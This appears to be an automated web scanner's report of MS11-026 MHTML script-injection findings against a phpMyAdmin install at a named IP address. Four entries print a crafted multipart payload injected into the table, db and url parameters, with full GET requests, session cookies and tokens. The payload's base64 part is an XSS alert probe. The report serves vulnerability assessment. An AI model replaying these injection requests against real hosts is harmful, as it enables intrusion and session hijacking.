Microsoft Windows MHTML Script Code Injection Vulnerability (MS11-026)
URL http://202.201.39.48/phpmyadmin/index.php?lang=zh_CN&table=atestu&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu
Request method GET
Affected parameter table
Detection criteria 1. Change the value of the specified parameter to the special string that triggers the MHTML vulnerability, then send the request;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/phpmyadmin/index.php?lang=zh_CN&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu&table=atestu----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie
2. Set parameter table----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie
3. Match in the response headers and response body: ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie
Request & response GET /phpmyadmin/index.php?lang=zh_CN&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu&table=atestu----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: phpMyAdmin=mdts1m7vkoi6f9m9nviodtgpq7crc516;pma_lang=zh_CN
  • Referer: http://202.201.39.48/phpmyadmin/index.php

URL http://202.201.39.48/phpmyadmin/index.php?lang=zh_CN&table=atestu&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu
Request method GET
Affected parameter db
Detection criteria 1. Change the value of the specified parameter to the special string that triggers the MHTML vulnerability, then send the request;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/phpmyadmin/index.php?lang=zh_CN&table=atestu&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie
2. Set parameter db----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie
3. Match in the response headers and response body: ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie
Request & response GET /phpmyadmin/index.php?lang=zh_CN&table=atestu&token=b75bba5fa7203396feddaf1661b8a65c&db=atestu----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: phpMyAdmin=mdts1m7vkoi6f9m9nviodtgpq7crc516;pma_lang=zh_CN
  • Referer: http://202.201.39.48/phpmyadmin/index.php

URL http://202.201.39.48/phpmyadmin/url.php?url=https://www.phpmyadmin.net/&lang=zh_CN&token=5137e026c7ba9f6adc23fe631d612ace
Request method GET
Affected parameter url
Detection criteria 1. Change the value of the specified parameter to the special string that triggers the MHTML vulnerability, then send the request;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/phpmyadmin/url.php?lang=zh_CN&token=5137e026c7ba9f6adc23fe631d612ace&url=https://www.phpmyadmin.net/----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie
2. Set parameter url----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie
3. Match in the response headers and response body: ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie
Request & response GET /phpmyadmin/url.php?lang=zh_CN&token=5137e026c7ba9f6adc23fe631d612ace&url=https://www.phpmyadmin.net/----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: phpMyAdmin=mdts1m7vkoi6f9m9nviodtgpq7crc516;pma_lang=zh_CN
  • Referer: http://202.201.39.48/phpmyadmin/index.php

URL http://202.201.39.48/phpmyadmin/url.php?url=https://www.phpmyadmin.net/&token=7f6f76c93661b81b29cd7457ecae1b45
Request method GET
Affected parameter url
Detection criteria 1. Change the value of the specified parameter to the special string that triggers the MHTML vulnerability, then send the request;
2. If the browser can execute the injected code, the vulnerability is considered present.
Detection details 1. Constructed URL: http://202.201.39.48/phpmyadmin/url.php?token=7f6f76c93661b81b29cd7457ecae1b45&url=https://www.phpmyadmin.net/----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie
2. Set parameter url----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie
3. Match in the response headers and response body: ----%0D%0AContent-Type%3A%20multipart%2Frelated%3B%20boundary=_webscan_atestu%0D%0A%0D%0A--_webscan_atestu%0D%0AContent-Location%3Acookie%0D%0AContent-Transfer-Encoding%3Abase64%0D%0A%0D%0APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%0D%0A--_webscan_atestu--%0D%0A%0D%0A!cookie
Request & response GET /phpmyadmin/url.php?token=7f6f76c93661b81b29cd7457ecae1b45&url=https://www.phpmyadmin.net/----%250D%250AContent-Type%253A%2520multipart%252Frelated%253B%2520boundary=_webscan_atestu%250D%250A%250D%250A--_webscan_atestu%250D%250AContent-Location%253Acookie%250D%250AContent-Transfer-Encoding%253Abase64%250D%250A%250D%250APHNjcmlwdD5hbGVydCgveHNzLyk8L3NjcmlwdD4=%250D%250A--_webscan_atestu--%250D%250A%250D%250A!cookie HTTP/1.1
  • Accept-Language: zh-cn,en-us;q=0.7,en;q=0.3
  • Accept-Encoding: gzip,deflate
  • Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  • User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:33.0) Gecko/20100101 Firefox/33.0
  • Accept-Charset: GBK,utf-8;q=0.7,*;q=0.3
  • Host: 202.201.39.48
  • cookie: phpMyAdmin=mdts1m7vkoi6f9m9nviodtgpq7crc516;pma_lang=zh_CN;pmaAuth-1=deleted
  • Referer: http://202.201.39.48/phpmyadmin/index.php